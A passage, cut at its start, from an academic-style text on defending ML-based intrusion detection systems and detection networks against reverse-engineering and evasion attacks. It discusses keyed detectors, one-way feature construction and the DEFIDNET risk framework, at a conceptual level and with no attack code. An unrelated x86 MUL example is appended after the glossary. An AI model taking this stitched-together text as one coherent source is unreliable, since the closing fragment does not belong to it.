ending cat and mouse game. Attackers evolve their modus operandi when
network defenses are bolstered or improved.
Networked systems are typically compromised when too little attention is paid
to the modus operandi of attacks and to their frequency. Many IDSs
concentrate solely on blocking mechanisms, without intelligent analysis being
deployed at the coding and deployment levels, and with manual security
scrutiny that is limited, constrained or ad hoc. Two promising defensive
directions, keyed detection functions and one-way feature construction, are
discussed below.
The sophistication of attackers evolves in parallel with the robustness of
defenses. Thus, the design of robust countermeasures seems to be a
never-ending rigmarole. There are many solutions to counteract current
attacks, but these contributions involve extensive work and open new and
interesting research challenges.
Defending ML based IDSs from reverse engineering and evasion attacks
requires some assumptions about the adversary that are reasonable nowadays:
concretely, that the attacker knows the training data distribution and the
feature construction method. Even assuming that this information is available
to the adversary, an effective mechanism would be to hide some other
information relevant to detection. This way, the attacker would not know how
to craft attack vectors that evade the classifier. A recent approach is to use
keys in the detection function. These keys, which are secret, determine the
internal behavior of the detector. However, the use of secret information may
itself be vulnerable to reverse engineering attacks if not done properly.
Attacks succeed because the adversary can easily invert the feature
construction process, and thus obtain real world evasions from the feature
vectors. Accordingly, research on one way feature construction methods (i.e.
methods which cannot be inverted) may counteract such attacks. Still, a
security analysis of these functions would be required before considering
them for real world scenarios.
Another open issue is the generalization of reverse engineering attacks to
randomized IDSs. While the same idea can be extended to other randomized
detectors using a formal definition, more concrete, practical work is needed
to generate similar attack strategies.
The design of countermeasures against reverse engineering attacks on
Anagram also needs to be considered. For example, a possible
countermeasure to the reverse engineering attack described here is to
randomize the choice of the random mask itself. However, the potential
impact of such double randomization on detection must be analyzed further.
The three points discussed so far suggest that strengthening the security of
IDSs is a continuing race between attackers and defenders.
One possible countermeasure is to update DEFIDNET to facilitate dynamic
analysis of IDNs. One advantage of the proposed DEFIDNET framework is
that it facilitates the assessment of the risk of IDNs by virtually defining the
assets and adversarial capabilities in the IDN. Thus, it can be applied in
dynamic scenarios by setting the parameters appropriately in real time.
Dynamic analysis assumes that the adversarial model changes over time, due
to the establishment of new countermeasures in the node channels, the
addition of new nodes and connections in the IDN, changes in the influences,
and so on. This dynamism requires constant reconfiguration. For example, if it
is known that a certain node is compromised and setting countermeasures in
this node cannot be afforded, then it may be useful to decrease the influence of
this node to reduce the propagation of risk. Currently, reconfiguration is not
optimized in DEFIDNET, as it must be performed manually. Automatic
reconfiguration of the network would therefore allow faster, dynamic risk
analysis.
A possible implementation of DEFIDNET with dynamic analysis would be its
integration with cloud computing platforms designed to deploy and manage
large networks of virtual machines. These virtual machines would be
instantiated as nodes of the IDN. Thus, whenever a new virtual machine is
created in the network, DEFIDNET may automatically suggest reconfiguration
alternatives and countermeasures to reduce the risk of the IDN.
Conclusion
All software is made up of machine-readable code. In fact, code is what makes
every program function the way it does. The code defines the software and the
decisions it will make. Reverse engineering, as applied to software, is the
process of looking for patterns in this code. By identifying certain code
patterns, an attacker can locate potential software vulnerabilities. Although
reverse engineering is generally legal as long as it is not used to explicitly
copy another product, the ethical debate is sure to endure.
The main goal is to improve the security of intrusion detection systems and
networks operating with both external and internal adversaries, by developing
techniques to analyze their vulnerabilities and countermeasures to increase
their resilience. In reality it is nigh on impossible to make IDNs 100% secure
in real world scenarios: every independent node in the IDN would need to be
properly secured, which is unrealistic in real world infrastructures where
economic and operational constraints apply. Consequently, it is necessary to
provide resilient architectures that keep the protection operative even when
some nodes are being targeted.
IDNs may have many different architectures and operational settings, which
makes them a complex scenario. Traditionally, the more complex a system is,
the more security breaches it may expose. Accordingly, it is critical to design
methods that provide operators with global awareness of IDNs, including
their assets and the threats to which they are exposed, thereby facilitating the
security evaluation of IDNs. The abstraction offered by DEFIDNET provides
several advantages for designing resilient IDN architectures. On the one hand,
it facilitates the definition of the assets of the IDN and the adversarial
capabilities, which in turn facilitates risk assessment. On the other hand, it
allows a business or organization to devise defense strategies, optimizing the
allocation of countermeasures so as to save resources, which is always the
ultimate goal of IDN systems.
Glossary
AI Artificial Intelligence
AS Attack Strategy
EA Evolutionary Algorithm
ESF Event Sharing Function
FC Feature Construction
GP Genetic Programming
ML Machine Learning
RF Response Function
The following x86 fragments illustrate unsigned multiplication: MUL leaves
the full 64-bit product in the EDX:EAX register pair.

mov eax,3          ; multiplicand
mov ecx,22222222h  ; multiplier
mul ecx            ; EDX:EAX = 0:66666666h - the product fits in EAX,
                   ; so EDX=0 and the carry flag is clear

mov eax,3
mov ecx,80000000h
mul ecx            ; EDX:EAX = 1:80000000h - the product overflows EAX,
                   ; so EDX=1 and the carry and overflow flags are set